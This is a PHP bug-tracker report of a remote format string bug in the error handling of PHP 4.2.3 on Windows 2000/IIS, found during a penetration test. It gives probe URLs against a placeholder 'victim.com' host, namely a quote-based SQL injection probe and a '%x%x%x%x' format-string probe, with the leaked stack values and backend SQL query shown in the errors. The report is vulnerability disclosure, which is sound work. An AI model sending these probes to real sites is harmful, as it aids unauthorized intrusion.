From: [EMAIL PROTECTED] Operating system: Win2k PHP version: 4.2.3 PHP Bug Type: IIS related Bug description: Remote Format String Bug
During a Pentest, I was searching for sql injection, and noticed that PHP returned the following error http://www.victim.com/cgi-bin/ecust.cfg/php.exe/enduser/std_adp.php?p_admin=1&p_faqid=510' Internal Error -------------------------------------------------------------------------------- File: odbc2.c Line: 211 In Fcn.: sql_prepare Called Fcn.: SQLPrepare() returned -1 Description: 42000: [Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string ')'. 42000: [Microsoft][ODBC SQL Server Driver][SQL Server]Line 7: Incorrect syntax near ')'. 42000: [Microsoft][ODBC SQL Server Driver][SQL Server]Statement(s) could not be prepared. SQL STMT: select f.faq_id, f.faq_group_id, f.lang_id, f.title, f.description, f.solution, f.created, f.updated, l1.label, l2.label from faqs f left outer join labels l1 on (f.access_id = l1.label_id) and (11 = l1.tbl) and (f.lang_id = l1.lang_id) left outer join labels l2 on (f.status = l2.label_id) and (19 = l2.tbl) and (f.lang_id = l2.lang_id) ,statuses s where (f.status = s.code) and (s.type_id = 4) and (f.access_id in (1, 2)) and (f.faq_id = 510') Indicating SQL injection. By entering http://www.victim.com/cgi-bin/ecust.cfg/php.exe/enduser/std_adp.php?p_admin=1&p_faqid=510'A You will notice in that the returned error message shows the 'A Internal Error -------------------------------------------------------------------------------- File: odbc2.c Line: 211 In Fcn.: sql_prepare Called Fcn.: SQLPrepare() returned -1 Description: 42000: [Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string 'A)'. 42000: [Microsoft][ODBC SQL Server Driver][SQL Server]Line 7: Incorrect syntax near 'A)'. 42000: [Microsoft][ODBC SQL Server Driver][SQL Server]Statement(s) could not be prepared. SQL STMT: select f.faq_id, f.faq_group_id, f.lang_id, f.title, f.description, f.solution, f.created, f.updated, l1.label, l2.label from faqs f left outer join labels l1 on (f.access_id = l1.label_id) and (11 = l1.tbl) and (f.lang_id = l1.lang_id) left outer join labels l2 on (f.status = l2.label_id) and (19 = l2.tbl) and (f.lang_id = l2.lang_id) ,statuses s where (f.status = s.code) and (s.type_id = 4) and (f.access_id in (1, 2)) and (f.faq_id = 510'A) To test for the poosibility of a Format String I entered the following http://victim.com/cgi-bin/ecust.cfg/php.exe/enduser/std_adp.php?p_admin=1&p_faqid=510'%x%x%x%x You will note from the Error logs that a format string bug is present in Four different fields Internal Error -------------------------------------------------------------------------------- File: odbc2.c Line: 211 In Fcn.: sql_prepare Called Fcn.: SQLPrepare() returned -1 Description: 42000: [Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string '51275075127680)'. 42000: [Microsoft][ODBC SQL Server Driver][SQL Server]Line 7: Incorrect syntax near '10081b6e0ffffffffdf1eb0)'. 42000: [Microsoft][ODBC SQL Server Driver][SQL Server]Statement(s) could not be prepared. SQL STMT: select f.faq_id, f.faq_group_id, f.lang_id, f.title, f.description, f.solution, f.created, f.updated, l1.label, l2.label from faqs f left outer join labels l1 on (f.access_id = l1.label_id) and (11 = l1.tbl) and (f.lang_id = l1.lang_id) left outer join labels l2 on (f.status = l2.label_id) and (19 = l2.tbl) and (f.lang_id = l2.lang_id) ,statuses s where (f.status = s.code) and (s.type_id = 4) and (f.access_id in (1, 2)) and (f.faq_id = 510'12fbe8cf7124b4a018b46030) This format string bug is NOT dependent on there being SQL injection present. To get the format string you just have to cause an error example http://www.victim.com/cgi-bin/ecust.cfg/php.exe/enduser/std_adp.php?p_admin=1&p_faqid=510> This obviously indicates that the Format String is in the Error Handling process. Regards Mark Litchfield www.ngssoftware.com Tel +44 1241 431367 email: [EMAIL PROTECTED] -- Edit bug report at http://bugs.php.net/?id=20124&edit=1 -- Try a CVS snapshot: http://bugs.php.net/fix.php?id=20124&r=trysnapshot Fixed in CVS: http://bugs.php.net/fix.php?id=20124&r=fixedcvs Fixed in release: http://bugs.php.net/fix.php?id=20124&r=alreadyfixed Need backtrace: http://bugs.php.net/fix.php?id=20124&r=needtrace Try newer version: http://bugs.php.net/fix.php?id=20124&r=oldversion Not developer issue: http://bugs.php.net/fix.php?id=20124&r=support Expected behavior: http://bugs.php.net/fix.php?id=20124&r=notwrong Not enough info: http://bugs.php.net/fix.php?id=20124&r=notenoughinfo Submitted twice: http://bugs.php.net/fix.php?id=20124&r=submittedtwice register_globals: http://bugs.php.net/fix.php?id=20124&r=globals PHP 3 support discontinued: http://bugs.php.net/fix.php?id=20124&r=php3 Daylight Savings: http://bugs.php.net/fix.php?id=20124&r=dst IIS Stability: http://bugs.php.net/fix.php?id=20124&r=isapi